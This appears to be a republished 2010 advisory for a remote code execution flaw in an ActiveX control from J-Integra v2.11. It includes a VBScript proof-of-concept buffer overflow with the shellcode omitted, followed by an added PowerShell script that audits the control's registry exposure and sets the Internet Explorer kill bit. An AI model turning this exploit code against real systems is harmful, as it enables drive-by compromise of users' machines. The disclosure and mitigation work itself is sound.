J-Integra v2.11 remote code execution vulnerability

2010-12-03T00:00:00
ID MYHACK58:62201028478
Type myhack58
Reporter Anonymous
Modified 2010-12-03T00:00:00

Description

J-Integra is a powerful middleware that makes Java interoperable with COM, and J2EE with .NET. It is divided into three products: J-Integra for COM, J-Integra for .NET and J-Integra for Exchange. A control in J-Integra v2.11 contains a remote code execution vulnerability that attackers could exploit to launch drive-by (web Trojan) attacks.

[+]info:
~~~~~~~~~
j-integra v2.11 Remote code execution vulnerability
Discovered on: Thursday, October 28, 2010, 10:10:12 PM
Download: http://j-integra.intrinsyc.com/
Author: bz1p, bz1p@bshellz.net
Impact: LOW, due to the object NOT marked safe for scripting
Tested on: XP SP3 IE7
CVE: ? (0day)

[+]poc:
~~~~~~~~~

```html
<html>

<object classid='clsid:F21507A7-530F-4A89-8FE4-9D989670FD2C' id='target'></object>
<script language='vbscript'>
esp = String(100, "B")

' calc = <encoded payload string, not reproduced here>

eip = unescape("%2f%55%02%10") ' CALL EDI
arg1 = String(253, "A")
arg1 = arg1 + eip + esp + calc
arg2 = "defaultV"

target.RemoveLaunchPermission arg1, arg2
</script>
</html>
```

[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/15648
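
The advisory rates the impact LOW because the control is not marked safe for scripting. As an added example (not part of the original advisory or any vendor tooling), the PowerShell below checks on a host whether the PoC's CLSID is registered, whether its registry categories mark it safe for scripting or initialization, and whether the Internet Explorer kill bit is set, and can set that bit. It assumes machine-wide (HKLM) registration; a control can also declare safety at run time through IObjectSafety, which a registry check does not see. The function names are hypothetical.

```powershell
# Added example: audit and optionally kill-bit one ActiveX CLSID (run elevated to set).
$Clsid         = '{F21507A7-530F-4A89-8FE4-9D989670FD2C}'  # CLSID from the PoC on this page
$SafeScripting = '{7DD95801-9882-11CF-9FA9-00AA00A03C89}'  # CATID_SafeForScripting
$SafeInit      = '{7DD95802-9882-11CF-9FA9-00AA00A03C89}'  # CATID_SafeForInitializing
$KillBit       = 0x400                                     # kill bit in "Compatibility Flags"
# Native and 32-bit (WOW6432Node) registry views; only HKLM is inspected (assumption).
$Roots         = 'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node'

function Get-ActiveXExposure {
    param([Parameter(Mandatory)][string]$Id)
    foreach ($root in $Roots) {
        $class  = "$root\Classes\CLSID\$Id"
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Id"
        $prop   = Get-ItemProperty -LiteralPath $compat -Name 'Compatibility Flags' `
                      -ErrorAction SilentlyContinue
        $flags  = if ($prop) { [int]$prop.'Compatibility Flags' } else { 0 }
        [pscustomobject]@{
            View             = $root
            Registered       = Test-Path -LiteralPath $class
            SafeForScripting = Test-Path -LiteralPath "$class\Implemented Categories\$SafeScripting"
            SafeForInit      = Test-Path -LiteralPath "$class\Implemented Categories\$SafeInit"
            KillBitSet       = [bool]($flags -band $KillBit)
        }
    }
}

function Set-ActiveXKillBit {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Id)
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }  # no WOW6432Node on 32-bit Windows
        $compat = "$root\Microsoft\Internet Explorer\ActiveX Compatibility\$Id"
        if ($PSCmdlet.ShouldProcess($compat, 'Set kill bit')) {
            # Create the key only if missing so existing values are preserved.
            if (-not (Test-Path -LiteralPath $compat)) { New-Item -Path $compat -Force | Out-Null }
            $prop = Get-ItemProperty -LiteralPath $compat -Name 'Compatibility Flags' `
                        -ErrorAction SilentlyContinue
            $cur  = if ($prop) { [int]$prop.'Compatibility Flags' } else { 0 }
            Set-ItemProperty -LiteralPath $compat -Name 'Compatibility Flags' `
                -Type DWord -Value ($cur -bor $KillBit)
        }
    }
}

Get-ActiveXExposure -Id $Clsid | Format-Table -AutoSize
# Set-ActiveXKillBit -Id $Clsid -WhatIf   # preview first, then drop -WhatIf to apply
```

The kill bit only stops Internet Explorer from instantiating the control; COM clients outside the browser are unaffected, so installing a fixed vendor build remains the actual remedy.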